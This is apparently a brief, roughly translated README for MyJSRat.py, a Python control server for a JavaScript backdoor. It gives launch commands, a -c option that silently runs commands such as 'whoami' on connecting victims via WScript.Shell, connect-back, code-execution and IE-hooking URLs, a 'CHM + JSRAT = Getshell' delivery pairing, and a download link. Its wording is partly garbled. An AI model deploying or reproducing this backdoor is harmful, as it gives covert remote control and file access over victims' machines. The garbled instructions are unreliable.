0x00 JSbackdoor
About javascript backdoor please see:
0x01 Description
After studying JSbackdoor thinking about writing a py version, and later found to have a small partner wrote the following address: JSRat-Py
When tested using, in order to be more convenient for the above script has been modified to add the
-c parameter can automatically execute commands after the client connection. Specific use is as follows: 
nteractive mode command is as follows :
python MyJSRat.py -i 192.168.1.101 -p 8080
-u is optional, even for the return url address.
Interactive mode for file upload, download, delete, command execution.
Run mode command as follows :
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "whoami"
Under Run mode, automatically executed after obtaining the specified command shell, use thenew new the ActiveXObject ( "WScript.Shell"). The Run (Command, 0, to true), perform no echo, no bomb box.
Interface as follows:
Send command:
0x02 URL Description
- http://192.168.1.101:8080/connect default back to even address
- http://192.168.1.101:8080/wtf visit this link for client code execution
- http://192.168.1.101:8080/hook browser hook link for some versions of IE
0x03 actual use
CHM + JSRAT = Getshell
Download tool : https://goo.gl/Pp3MNV
Posts
